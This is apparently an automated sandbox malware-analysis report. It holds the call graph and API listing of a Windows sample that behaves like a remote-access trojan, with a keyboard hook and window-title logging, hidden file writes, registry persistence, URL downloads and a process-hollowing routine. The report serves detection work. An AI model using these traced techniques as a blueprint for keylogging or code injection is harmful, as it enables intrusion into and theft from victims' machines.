402ea1 28 API calls 53987->54016 54017 404aa1 61 API calls 53987->54017 54018 401fd8 11 API calls 53987->54018 54019 404c10 265 API calls 53987->54019 54021 415a71 CreateThread 53987->54021 54022 401f09 11 API calls 53987->54022 54462 414ee9 53987->54462 54467 41b7e0 53987->54467 54470 4145bd 53987->54470 54473 40dd89 53987->54473 54479 41bc42 53987->54479 54482 41bae6 GetLastInputInfo GetTickCount 53987->54482 54483 40f8d1 GetLocaleInfoA 53987->54483 54488 4052fd 28 API calls 53987->54488 53988->53987 53989->53987 53990->53987 53991 401e65 22 API calls 53991->53994 53992->53987 53993->53987 53994->53991 53995 43baac 40 API calls 53994->53995 54489 40b051 85 API calls 53994->54489 53996 415acf Sleep 53995->53996 53996->53987 53999->53987 54000->53987 54001->53987 54002->53987 54003->53987 54004->53987 54008 415439 GetTickCount 54007->54008 54009 41bb8e 28 API calls 54008->54009 54009->53987 54011->53987 54012->53987 54013->53987 54015->53987 54016->53987 54017->53987 54018->53987 54019->53987 54021->53987 54522 41ad17 106 API calls 54021->54522 54022->53987 54023->53463 54024->53471 54025->53475 54028 4020df 11 API calls 54027->54028 54029 406c2a 54028->54029 54030 4032a0 28 API calls 54029->54030 54031 406c47 54030->54031 54031->53496 54033 40eba4 54032->54033 54034 413573 RegQueryValueExA RegCloseKey 54032->54034 54033->53493 54033->53510 54034->54033 54035->53499 54036->53529 54037->53522 54038->53513 54039->53527 54041 401f86 11 API calls 54040->54041 54042 40da50 54041->54042 54043 40da70 54042->54043 54044 40daa5 54042->54044 54046 40da66 54042->54046 54538 41b5b4 29 API calls 54043->54538 54047 41bfb7 2 API calls 54044->54047 54045 40db99 GetLongPathNameW 54049 40417e 28 API calls 54045->54049 54046->54045 54050 40daaa 54047->54050 54053 40dbae 54049->54053 54054 40db00 54050->54054 54055 40daae 54050->54055 54051 40da79 54052 401f13 28 API calls 54051->54052 54056 40da83 54052->54056 54057 40417e 28 API calls 54053->54057 54058 40417e 28 API calls 54054->54058 54059 40417e 28 API calls 54055->54059 54063 401f09 11 API calls 54056->54063 54060 40dbbd 54057->54060 54061 40db0e 54058->54061 54062 40dabc 54059->54062 54523 40ddd1 54060->54523 54067 40417e 28 API calls 54061->54067 54068 40417e 28 API calls 54062->54068 54063->54046 54071 40db24 54067->54071 54069 40dad2 54068->54069 54073 402fa5 28 API calls 54069->54073 54072 402fa5 28 API calls 54071->54072 54075 40db2f 54072->54075 54076 40dadd 54073->54076 54074 402fa5 28 API calls 54077 40dbe5 54074->54077 54079 401f13 28 API calls 54075->54079 54080 401f13 28 API calls 54076->54080 54078 401f09 11 API calls 54077->54078 54081 40dbef 54078->54081 54082 40db3a 54079->54082 54083 40dae8 54080->54083 54084 401f09 11 API calls 54081->54084 54085 401f09 11 API calls 54082->54085 54086 401f09 11 API calls 54083->54086 54087 40dbf8 54084->54087 54088 40db43 54085->54088 54089 40daf1 54086->54089 54090 401f09 11 API calls 54087->54090 54091 401f09 11 API calls 54088->54091 54092 401f09 11 API calls 54089->54092 54093 40dc01 54090->54093 54091->54056 54092->54056 54094 401f09 11 API calls 54093->54094 54095 40dc0a 54094->54095 54096 401f09 11 API calls 54095->54096 54097 40dc13 54096->54097 54097->53587 54098->53600 54099->53621 54101 41371e RegQueryValueExA RegCloseKey 54100->54101 54102 413742 54100->54102 54101->54102 54102->53580 54103->53615 54110 4344ef 54104->54110 54105 43bd51 ___std_exception_copy 21 API calls 54105->54110 54106 40f0d1 54106->53652 54110->54105 54110->54106 54543 442f80 7 API calls 2 library calls 54110->54543 54544 434c35 RaiseException Concurrency::cancel_current_task __CxxThrowException@8 54110->54544 54545 43526e RaiseException Concurrency::cancel_current_task __CxxThrowException@8 54110->54545 54112 402093 28 API calls 54111->54112 54113 40d9ff 54112->54113 54114 41bc5e 28 API calls 54113->54114 54115 40da0a 54114->54115 54116 40da34 32 API calls 54115->54116 54117 40da1b 54116->54117 54118 401f09 11 API calls 54117->54118 54119 40da24 54118->54119 54120 401fd8 11 API calls 54119->54120 54121 40da2c 54120->54121 54121->53686 54122->53671 54124->53715 54125->53520 54128 41b4c5 LoadResource LockResource SizeofResource 54127->54128 54129 40f3de 54127->54129 54128->54129 54129->53817 54131 4020b7 28 API calls 54130->54131 54132 406dec 54131->54132 54132->53828 54133->53831 54136 41bfc4 GetCurrentProcess IsWow64Process 54135->54136 54137 41b2d1 54135->54137 54136->54137 54138 41bfdb 54136->54138 54139 4135a6 RegOpenKeyExA 54137->54139 54138->54137 54140 4135d4 RegQueryValueExA RegCloseKey 54139->54140 54141 4135fe 54139->54141 54140->54141 54142 402093 28 API calls 54141->54142 54143 413613 54142->54143 54143->53841 54144->53849 54145->53863 54147 402347 54146->54147 54148 402252 11 API calls 54147->54148 54149 4023c7 54148->54149 54149->53863 54151 40a127 54150->54151 54152 413549 3 API calls 54151->54152 54153 40a12e 54152->54153 54154 40a142 54153->54154 54155 40a15c 54153->54155 54157 409e9b 54154->54157 54158 40a147 54154->54158 54171 40905c 54155->54171 54157->53644 54160 40905c 28 API calls 54158->54160 54162 40a155 54160->54162 54199 40a22d 29 API calls 54162->54199 54164 40a15a 54164->54157 54165->53904 54333 403222 54166->54333 54168 403022 54337 403262 54168->54337 54172 409072 54171->54172 54173 402252 11 API calls 54172->54173 54174 40908c 54173->54174 54175 404267 28 API calls 54174->54175 54176 40909a 54175->54176 54177 40a179 54176->54177 54200 40b8ec 54177->54200 54180 40a1a2 54183 402093 28 API calls 54180->54183 54181 40a1ca 54182 402093 28 API calls 54181->54182 54184 40a1d5 54182->54184 54185 40a1ac 54183->54185 54186 402093 28 API calls 54184->54186 54187 41bc5e 28 API calls 54185->54187 54188 40a1e4 54186->54188 54189 40a1ba 54187->54189 54190 41b4ef 80 API calls 54188->54190 54204 40b164 31 API calls ___std_exception_copy 54189->54204 54193 40a1e9 CreateThread 54190->54193 54192 40a1c1 54194 401fd8 11 API calls 54192->54194 54195 40a210 CreateThread 54193->54195 54196 40a204 CreateThread 54193->54196 54212 40a27d 54193->54212 54194->54181 54197 401f09 11 API calls 54195->54197 54209 40a289 54195->54209 54196->54195 54206 40a267 54196->54206 54198 40a224 54197->54198 54198->54157 54199->54164 54332 40a273 164 API calls 54199->54332 54201 40b8f5 54200->54201 54202 40a197 54200->54202 54205 40b96c 28 API calls 54201->54205 54202->54180 54202->54181 54204->54192 54205->54202 54215 40a2b8 54206->54215 54231 40acd6 54209->54231 54273 40a726 54212->54273 54216 40a2d1 GetModuleHandleA SetWindowsHookExA 54215->54216 54217 40a333 GetMessageA 54215->54217 54216->54217 54220 40a2ed GetLastError 54216->54220 54218 40a345 TranslateMessage DispatchMessageA 54217->54218 54219 40a270 54217->54219 54218->54217 54218->54219 54221 41bb8e 28 API calls 54220->54221 54222 40a2fe 54221->54222 54230 4052fd 28 API calls 54222->54230 54238 40ace4 54231->54238 54232 40a292 54233 40ad3e Sleep GetForegroundWindow GetWindowTextLengthW 54234 40b904 28 API calls 54233->54234 54234->54238 54238->54232 54238->54233 54239 41bae6 GetLastInputInfo GetTickCount 54238->54239 54241 40ad84 GetWindowTextW 54238->54241 54243 40aedc 54238->54243 54244 40b8ec 28 API calls 54238->54244 54246 40ae49 Sleep 54238->54246 54247 441e81 20 API calls 54238->54247 54249 402093 28 API calls 54238->54249 54250 40add1 54238->54250 54254 406383 28 API calls 54238->54254 54256 403014 28 API calls 54238->54256 54257 41bc5e 28 API calls 54238->54257 54258 40a636 12 API calls 54238->54258 54259 401f09 11 API calls 54238->54259 54260 401fd8 11 API calls 54238->54260 54261 4343e6 EnterCriticalSection LeaveCriticalSection WaitForSingleObjectEx __Init_thread_wait __Init_thread_footer 54238->54261 54262 401f86 54238->54262 54266 434770 23 API calls __onexit 54238->54266 54267 4343a7 SetEvent ResetEvent EnterCriticalSection LeaveCriticalSection __Init_thread_footer 54238->54267 54268 409044 28 API calls 54238->54268 54270 40b97c 28 API calls 54238->54270 54271 40b748 40 API calls 2 library calls 54238->54271 54272 4052fd 28 API calls 54238->54272 54239->54238 54241->54238 54245 401f09 11 API calls 54243->54245 54244->54238 54245->54232 54246->54238 54247->54238 54249->54238 54250->54238 54252 40905c 28 API calls 54250->54252 54269 40b164 31 API calls ___std_exception_copy 54250->54269 54252->54250 54254->54238 54256->54238 54257->54238 54258->54238 54259->54238 54260->54238 54263 401f8e 54262->54263 54264 402252 11 API calls 54263->54264 54265 401f99 54264->54265 54265->54238 54266->54238 54267->54238 54268->54238 54269->54250 54270->54238 54271->54238 54274 40a73b Sleep 54273->54274 54294 40a675 54274->54294 54276 40a286 54277 40a77b CreateDirectoryW 54281 40a74d 54277->54281 54278 40a78c GetFileAttributesW 54278->54281 54279 40a7a3 SetFileAttributesW 54279->54281 54281->54274 54281->54276 54281->54277 54281->54278 54281->54279 54283 401e65 22 API calls 54281->54283 54292 40a7ee 54281->54292 54307 41c3f1 54281->54307 54282 40a81d PathFileExistsW 54282->54292 54283->54281 54284 4020df 11 API calls 54284->54292 54285 4020b7 28 API calls 54285->54292 54287 40a926 SetFileAttributesW 54287->54281 54288 406dd8 28 API calls 54288->54292 54289 401fe2 28 API calls 54289->54292 54290 401fd8 11 API calls 54290->54292 54292->54282 54292->54284 54292->54285 54292->54287 54292->54288 54292->54289 54292->54290 54293 401fd8 11 API calls 54292->54293 54317 41c485 CreateFileW 54292->54317 54325 41c4f2 CreateFileW SetFilePointer CloseHandle WriteFile FindCloseChangeNotification 54292->54325 54293->54281 54295 40a722 54294->54295 54297 40a68b 54294->54297 54295->54281 54296 40a6aa CreateFileW 54296->54297 54298 40a6b8 GetFileSize 54296->54298 54297->54296 54299 40a6ed FindCloseChangeNotification 54297->54299 54300 40a6ff 54297->54300 54301 40a6e2 Sleep 54297->54301 54302 40a6db 54297->54302 54298->54297 54298->54299 54299->54297 54300->54295 54304 40905c 28 API calls 54300->54304 54301->54299 54326 40b0dc 84 API calls 54302->54326 54305 40a71b 54304->54305 54306 40a179 125 API calls 54305->54306 54306->54295 54308 41c404 CreateFileW 54307->54308 54310 41c441 54308->54310 54311 41c43d 54308->54311 54312 41c461 WriteFile 54310->54312 54313 41c448 SetFilePointer 54310->54313 54311->54281 54315 41c474 54312->54315 54316 41c476 FindCloseChangeNotification 54312->54316 54313->54312 54314 41c458 CloseHandle 54313->54314 54314->54311 54315->54316 54316->54311 54318 41c4ab 54317->54318 54319 41c4af GetFileSize 54317->54319 54318->54292 54327 40244e 54319->54327 54321 41c4c3 54322 41c4d5 ReadFile 54321->54322 54323 41c4e2 54322->54323 54324 41c4e4 FindCloseChangeNotification 54322->54324 54323->54324 54324->54318 54325->54292 54326->54301 54328 402456 54327->54328 54330 402460 54328->54330 54331 402a51 28 API calls 54328->54331 54330->54321 54331->54330 54334 40322e 54333->54334 54343 403618 54334->54343 54336 40323b 54336->54168 54338 40326e 54337->54338 54339 402252 11 API calls 54338->54339 54340 403288 54339->54340 54341 402336 11 API calls 54340->54341 54342 403031 54341->54342 54342->53908 54344 403626 54343->54344 54345 403644 54344->54345 54346 40362c 54344->54346 54347 40365c 54345->54347 54348 40369e 54345->54348 54354 4036a6 54346->54354 54352 4027e6 28 API calls 54347->54352 54353 403642 54347->54353 54363 4028a4 22 API calls 54348->54363 54352->54353 54353->54336 54355 402888 22 API calls 54354->54355 54356 4036b9 54355->54356 54357 40372c 54356->54357 54358 4036de 54356->54358 54364 4028a4 22 API calls 54357->54364 54361 4027e6 28 API calls 54358->54361 54362 4036f0 54358->54362 54361->54362 54362->54353 54370 404353 54365->54370 54367 40430a 54368 403262 11 API calls 54367->54368 54369 404319 54368->54369 54369->53916 54371 40435f 54370->54371 54374 404371 54371->54374 54373 40436d 54373->54367 54375 40437f 54374->54375 54376 404385 54375->54376 54377 40439e 54375->54377 54438 4034e6 28 API calls 54376->54438 54378 402888 22 API calls 54377->54378 54379 4043a6 54378->54379 54381 404419 54379->54381 54382 4043bf 54379->54382 54439 4028a4 22 API calls 54381->54439 54384 4027e6 28 API calls 54382->54384 54393 40439c 54382->54393 54384->54393 54393->54373 54438->54393 54446 43aa9a 54440->54446 54444 4138b9 54443->54444 54445 41388f RegSetValueExA RegCloseKey 54443->54445 54444->53935 54445->54444 54449 43aa1b 54446->54449 54448 40170d 54448->53933 54450 43aa2a 54449->54450 54451 43aa3e 54449->54451 54455 4405dd 20 API calls _Atexit 54450->54455 54454 43aa2f pre_c_initialization __alldvrm 54451->54454 54456 448957 11 API calls 2 library calls 54451->54456 54454->54448 54455->54454 54456->54454 54460 41b8f9 ctype ___scrt_fastfail 54457->54460 54458 402093 28 API calls 54459 414f49 54458->54459 54459->53941 54460->54458 54461->53958 54463 414f02 getaddrinfo WSASetLastError 54462->54463 54464 414ef8 54462->54464 54463->53987 54490 414d86 29 API calls ___std_exception_copy 54464->54490 54466 414efd 54466->54463 54491 41b7b6 GlobalMemoryStatusEx 54467->54491 54469 41b7f5 54469->53987 54492 414580 54470->54492 54474 40dda5 54473->54474 54475 4134ff 3 API calls 54474->54475 54477 40ddac 54475->54477 54476 40ddc4 54476->53987 54477->54476 54478 413549 3 API calls 54477->54478 54478->54476 54480 4020b7 28 API calls 54479->54480 54481 41bc57 54480->54481 54481->53987 54482->53987 54484 402093 28 API calls 54483->54484 54485 40f8f6 54484->54485 54485->53987 54486->53987 54487->53987 54489->53987 54490->54466 54491->54469 54495 414553 54492->54495 54496 414568 ___scrt_initialize_default_local_stdio_options 54495->54496 54499 43f79d 54496->54499 54502 43c4f0 54499->54502 54503 43c530 54502->54503 54504 43c518 54502->54504 54503->54504 54506 43c538 54503->54506 54517 4405dd 20 API calls _Atexit 54504->54517 54518 43a7b7 36 API calls 3 library calls 54506->54518 54507 43c51d pre_c_initialization 54511 434fcb CatchGuardHandler 5 API calls 54507->54511 54509 43c548 54519 43cc76 20 API calls 2 library calls 54509->54519 54513 414576 54511->54513 54512 43c5c0 54520 43d2e4 51 API calls 3 library calls 54512->54520 54513->53987 54516 43c5cb 54521 43cce0 20 API calls _free 54516->54521 54517->54507 54518->54509 54519->54512 54520->54516 54521->54507 54524 40ddd9 54523->54524 54525 402252 11 API calls 54524->54525 54526 40dde4 54525->54526 54527 4041d9 28 API calls 54526->54527 54528 40dbd0 54527->54528 54529 402fa5 54528->54529 54534 402fb4 54529->54534 54530 402ff6 54540 40323f 54530->54540 54532 402ff4 54533 403262 11 API calls 54532->54533 54535 40300d 54533->54535 54534->54530 54536 402feb 54534->54536 54535->54074 54539 403211 28 API calls 54536->54539 54538->54051 54539->54532 54541 4036a6 28 API calls 54540->54541 54542 40324c 54541->54542 54542->54532 54543->54110 54548 40f7c2 54546->54548 54547 413549 3 API calls 54547->54548 54548->54547 54549 40f866 54548->54549 54551 40f856 Sleep 54548->54551 54568 40f7f4 54548->54568 54552 40905c 28 API calls 54549->54552 54550 40905c 28 API calls 54550->54568 54551->54548 54555 40f871 54552->54555 54554 41bc5e 28 API calls 54554->54568 54556 41bc5e 28 API calls 54555->54556 54557 40f87d 54556->54557 54580 413814 14 API calls 54557->54580 54560 401f09 11 API calls 54560->54568 54561 40f890 54562 401f09 11 API calls 54561->54562 54564 40f89c 54562->54564 54563 402093 28 API calls 54563->54568 54565 402093 28 API calls 54564->54565 54566 40f8ad 54565->54566 54569 41376f 14 API calls 54566->54569 54567 41376f 14 API calls 54567->54568 54568->54550 54568->54551 54568->54554 54568->54560 54568->54563 54568->54567 54578 40d096 112 API calls ___scrt_fastfail 54568->54578 54579 413814 14 API calls 54568->54579 54570 40f8c0 54569->54570 54581 412850 TerminateProcess WaitForSingleObject 54570->54581 54572 40f8c8 ExitProcess 54579->54568 54580->54561 54581->54572 54582 4269e6 54583 4269fb 54582->54583 54588 426a8d 54582->54588 54584 426a48 54583->54584 54585 426b44 54583->54585 54586 426abd 54583->54586 54587 426b1d 54583->54587 54583->54588 54591 426af2 54583->54591 54595 426a7d 54583->54595 54610 424edd 49 API calls ctype 54583->54610 54584->54588 54584->54595 54611 41fb6c 52 API calls 54584->54611 54585->54588 54615 426155 28 API calls 54585->54615 54586->54588 54586->54591 54613 41fb6c 52 API calls 54586->54613 54587->54585 54587->54588 54598 425ae1 54587->54598 54591->54587 54614 4256f0 21 API calls 54591->54614 54595->54586 54595->54588 54612 424edd 49 API calls ctype 54595->54612 54600 425b00 ___scrt_fastfail 54598->54600 54599 425b34 54599->54585 54600->54599 54603 425b0f 54600->54603 54616 41ebbb 21 API calls 54600->54616 54601 425b14 54601->54599 54605 425b1d 54601->54605 54623 41da5f 49 API calls 54601->54623 54603->54599 54603->54601 54617 4205d8 46 API calls 54603->54617 54605->54599 54624 424d05 21 API calls 2 library calls 54605->54624 54608 425bb7 54608->54599 54618 432ec4 54608->54618 54610->54584 54611->54584 54612->54586 54613->54586 54614->54587 54615->54588 54616->54603 54617->54608 54619 432ed2 54618->54619 54620 432ece 54618->54620 54621 43bd51 ___std_exception_copy 21 API calls 54619->54621 54620->54601 54622 432ed7 54621->54622 54622->54601 54623->54605 54624->54599 54625 415d06 54640 41b380 54625->54640 54627 415d0f 54628 4020f6 28 API calls 54627->54628 54629 415d1e 54628->54629 54630 404aa1 61 API calls 54629->54630 54631 415d2a 54630->54631 54632 417089 54631->54632 54633 401fd8 11 API calls 54631->54633 54634 401e8d 11 API calls 54632->54634 54633->54632 54635 417092 54634->54635 54636 401fd8 11 API calls 54635->54636 54637 41709e 54636->54637 54638 401fd8 11 API calls 54637->54638 54639 4170aa 54638->54639 54641 4020df 11 API calls 54640->54641 54642 41b38e 54641->54642 54643 43bd51 ___std_exception_copy 21 API calls 54642->54643 54644 41b39e InternetOpenW InternetOpenUrlW 54643->54644 54645 41b3c5 InternetReadFile 54644->54645 54646 41b3e8 54645->54646 54646->54645 54647 4020b7 28 API calls 54646->54647 54648 41b415 InternetCloseHandle InternetCloseHandle 54646->54648 54650 401fd8 11 API calls 54646->54650 54647->54646 54649 41b427 54648->54649 54649->54627 54650->54646 54651 1000c7a7 54652 1000c7be 54651->54652 54657 1000c82c 54651->54657 54652->54657 54663 1000c7e6 GetModuleHandleA 54652->54663 54653 1000c872 54654 1000c835 GetModuleHandleA 54656 1000c83f 54654->54656 54656->54657 54658 1000c85f GetProcAddress 54656->54658 54657->54653 54657->54654 54657->54656 54658->54657 54659 1000c7dd 54659->54656 54659->54657 54660 1000c800 GetProcAddress 54659->54660 54660->54657 54661 1000c80d VirtualProtect 54660->54661 54661->54657 54662 1000c81c VirtualProtect 54661->54662 54662->54657 54664 1000c7ef 54663->54664 54670 1000c82c 54663->54670 54675 1000c803 GetProcAddress 54664->54675 54666 1000c7f4 54669 1000c800 GetProcAddress 54666->54669 54666->54670 54667 1000c872 54668 1000c835 GetModuleHandleA 54672 1000c83f 54668->54672 54669->54670 54671 1000c80d VirtualProtect 54669->54671 54670->54667 54670->54668 54670->54672 54671->54670 54673 1000c81c VirtualProtect 54671->54673 54672->54670 54674 1000c85f GetProcAddress 54672->54674 54673->54670 54674->54670 54676 1000c82c 54675->54676 54677 1000c80d VirtualProtect 54675->54677 54679 1000c872 54676->54679 54680 1000c835 GetModuleHandleA 54676->54680 54677->54676 54678 1000c81c VirtualProtect 54677->54678 54678->54676 54682 1000c83f 54680->54682 54681 1000c85f GetProcAddress 54681->54682 54682->54676 54682->54681 54683 426c4b 54688 426cc8 send 54683->54688 54689 43be58 54691 43be64 _swprintf ___DestructExceptionObject 54689->54691 54690 43be72 54705 4405dd 20 API calls _Atexit 54690->54705 54691->54690 54693 43be9c 54691->54693 54700 445888 EnterCriticalSection 54693->54700 54695 43bea7 54701 43bf48 54695->54701 54698 43be77 pre_c_initialization ___DestructExceptionObject 54700->54695 54703 43bf56 54701->54703 54702 43beb2 54706 43becf LeaveCriticalSection std::_Lockit::~_Lockit 54702->54706 54703->54702 54707 44976c 37 API calls 2 library calls 54703->54707 54705->54698 54706->54698 54707->54703 54708 41dfbd 54709 41dfd2 ctype ___scrt_fastfail 54708->54709 54711 432ec4 21 API calls 54709->54711 54721 41e1d5 54709->54721 54715 41e182 ___scrt_fastfail 54711->54715 54712 41e1e6 54713 41e189 54712->54713 54714 432ec4 21 API calls 54712->54714 54717 41e21f ___scrt_fastfail 54714->54717 54715->54713 54716 432ec4 21 API calls 54715->54716 54718 41e1af ___scrt_fastfail 54716->54718 54717->54713 54723 43354a 54717->54723 54718->54713 54720 432ec4 21 API calls 54718->54720 54720->54721 54721->54713 54722 41db62 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection ___scrt_fastfail 54721->54722 54722->54712 54726 433469 54723->54726 54725 433552 54725->54713 54727 433482 54726->54727 54731 433478 54726->54731 54728 432ec4 21 API calls 54727->54728 54727->54731 54729 4334a3 54728->54729 54729->54731 54732 433837 CryptAcquireContextA 54729->54732 54731->54725 54733 433858 CryptGenRandom 54732->54733 54734 433853 54732->54734 54733->54734 54735 43386d CryptReleaseContext 54733->54735 54734->54731 54735->54734 54736 40165e 54737 401666 54736->54737 54738 401669 54736->54738 54739 4016a8 54738->54739 54742 401696 54738->54742 54740 4344ea new 22 API calls 54739->54740 54741 40169c 54740->54741 54743 4344ea new 22 API calls 54742->54743 54743->54741 54744 426bdc 54750 426cb1 recv 54744->54750 54751 42f8ed 54752 42f8f8 54751->54752 54753 42f90c 54752->54753 54755 432eee 54752->54755 54756 432ef9 54755->54756 54757 432efd 54755->54757 54756->54753 54759 440f0d 54757->54759 54760 446185 54759->54760 54761 446192 54760->54761 54762 44619d 54760->54762 54772 446137 54761->54772 54764 4461a5 54762->54764 54770 4461ae ___crtLCMapStringA 54762->54770 54767 446782 _free 20 API calls 54764->54767 54765 4461b3 54779 4405dd 20 API calls _Atexit 54765->54779 54766 4461d8 RtlReAllocateHeap 54769 44619a 54766->54769 54766->54770 54767->54769 54769->54756 54770->54765 54770->54766 54780 442f80 7 API calls 2 library calls 54770->54780 54773 446175 54772->54773 54777 446145 ___crtLCMapStringA 54772->54777 54782 4405dd 20 API calls _Atexit 54773->54782 54775 446160 RtlAllocateHeap 54776 446173 54775->54776 54775->54777 54776->54769 54777->54773 54777->54775 54781 442f80 7 API calls 2 library calls 54777->54781 54779->54769 54780->54770 54781->54777 54782->54776

                      Control-flow Graph

                      APIs
                      • LoadLibraryA.KERNEL32(Psapi,GetProcessImageFileNameW,?,?,?,?,0040E9E1), ref: 0041CB65
                      • GetProcAddress.KERNEL32(00000000), ref: 0041CB6E
                      • GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040E9E1), ref: 0041CB85
                      • GetProcAddress.KERNEL32(00000000), ref: 0041CB88
                      • LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040E9E1), ref: 0041CB9A
                      • GetProcAddress.KERNEL32(00000000), ref: 0041CB9D
                      • LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040E9E1), ref: 0041CBAE
                      • GetProcAddress.KERNEL32(00000000), ref: 0041CBB1
                      • LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040E9E1), ref: 0041CBC3
                      • GetProcAddress.KERNEL32(00000000), ref: 0041CBC6
                      • LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040E9E1), ref: 0041CBD2
                      • GetProcAddress.KERNEL32(00000000), ref: 0041CBD5
                      • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040E9E1), ref: 0041CBE6
                      • GetProcAddress.KERNEL32(00000000), ref: 0041CBE9
                      • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040E9E1), ref: 0041CBFA
                      • GetProcAddress.KERNEL32(00000000), ref: 0041CBFD
                      • LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040E9E1), ref: 0041CC0E
                      • GetProcAddress.KERNEL32(00000000), ref: 0041CC11
                      • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040E9E1), ref: 0041CC22
                      • GetProcAddress.KERNEL32(00000000), ref: 0041CC25
                      • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040E9E1), ref: 0041CC36
                      • GetProcAddress.KERNEL32(00000000), ref: 0041CC39
                      • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040E9E1), ref: 0041CC4A
                      • GetProcAddress.KERNEL32(00000000), ref: 0041CC4D
                      • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040E9E1), ref: 0041CC5E
                      • GetProcAddress.KERNEL32(00000000), ref: 0041CC61
                      • GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040E9E1), ref: 0041CC72
                      • GetProcAddress.KERNEL32(00000000), ref: 0041CC75
                      • LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040E9E1), ref: 0041CC83
                      • GetProcAddress.KERNEL32(00000000), ref: 0041CC86
                      • LoadLibraryA.KERNEL32(kernel32,GetConsoleWindow,?,?,?,?,0040E9E1), ref: 0041CC97
                      • GetProcAddress.KERNEL32(00000000), ref: 0041CC9A
                      • GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040E9E1), ref: 0041CCA7
                      • GetProcAddress.KERNEL32(00000000), ref: 0041CCAA
                      • GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0040E9E1), ref: 0041CCB7
                      • GetProcAddress.KERNEL32(00000000), ref: 0041CCBA
                      • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedTcpTable,?,?,?,?,0040E9E1), ref: 0041CCCC
                      • GetProcAddress.KERNEL32(00000000), ref: 0041CCCF
                      • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedUdpTable,?,?,?,?,0040E9E1), ref: 0041CCDC
                      • GetProcAddress.KERNEL32(00000000), ref: 0041CCDF
                      • GetModuleHandleA.KERNEL32(ntdll,NtQueryInformationProcess,?,?,?,?,0040E9E1), ref: 0041CCF0
                      • GetProcAddress.KERNEL32(00000000), ref: 0041CCF3
                      • GetModuleHandleA.KERNEL32(kernel32,GetFinalPathNameByHandleW,?,?,?,?,0040E9E1), ref: 0041CD04
                      • GetProcAddress.KERNEL32(00000000), ref: 0041CD07
                      • LoadLibraryA.KERNEL32(Rstrtmgr,RmStartSession,?,?,?,?,0040E9E1), ref: 0041CD19
                      • GetProcAddress.KERNEL32(00000000), ref: 0041CD1C
                      • LoadLibraryA.KERNEL32(Rstrtmgr,RmRegisterResources,?,?,?,?,0040E9E1), ref: 0041CD29
                      • GetProcAddress.KERNEL32(00000000), ref: 0041CD2C
                      • LoadLibraryA.KERNEL32(Rstrtmgr,RmGetList,?,?,?,?,0040E9E1), ref: 0041CD39
                      • GetProcAddress.KERNEL32(00000000), ref: 0041CD3C
                      • LoadLibraryA.KERNEL32(Rstrtmgr,RmEndSession,?,?,?,?,0040E9E1), ref: 0041CD49
                      • GetProcAddress.KERNEL32(00000000), ref: 0041CD4C
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: AddressProc$LibraryLoad$HandleModule
                      • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetFinalPathNameByHandleW$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtQueryInformationProcess$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$RmEndSession$RmGetList$RmRegisterResources$RmStartSession$Rstrtmgr$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
                      • API String ID: 4236061018-3687161714
                      • Opcode ID: d30ec231acb52cdcc59a2b6b3fe3a558d95728f00a5c8bab653e1e11384c1c5d
                      • Instruction ID: 43d5c3d51f8f0173c8b3474e0c84bdc355f07b7b5b23ff39ae26555794408ecb
                      • Opcode Fuzzy Hash: d30ec231acb52cdcc59a2b6b3fe3a558d95728f00a5c8bab653e1e11384c1c5d
                      • Instruction Fuzzy Hash: 31419EA0EC035879DA107BB66DCDE3B3E5CD9857953214837B15CA7150EBBCD8408EAE

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 448 4180ef-418118 449 41811c-418183 GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress 448->449 450 418480 449->450 451 418189-418190 449->451 453 418482-41848c 450->453 451->450 452 418196-41819d 451->452 452->450 454 4181a3-4181a5 452->454 454->450 455 4181ab-4181d8 call 436e90 * 2 454->455 455->450 460 4181de-4181e9 455->460 460->450 461 4181ef-41821f CreateProcessW 460->461 462 418225-41824d VirtualAlloc Wow64GetThreadContext 461->462 463 41847a GetLastError 461->463 464 418253-418273 ReadProcessMemory 462->464 465 418444-418478 VirtualFree GetCurrentProcess NtUnmapViewOfSection NtClose TerminateProcess 462->465 463->450 464->465 466 418279-41829b NtCreateSection 464->466 465->450 466->465 467 4182a1-4182ae 466->467 468 4182c1-4182e3 NtMapViewOfSection 467->468 469 4182b0-4182bb NtUnmapViewOfSection 467->469 470 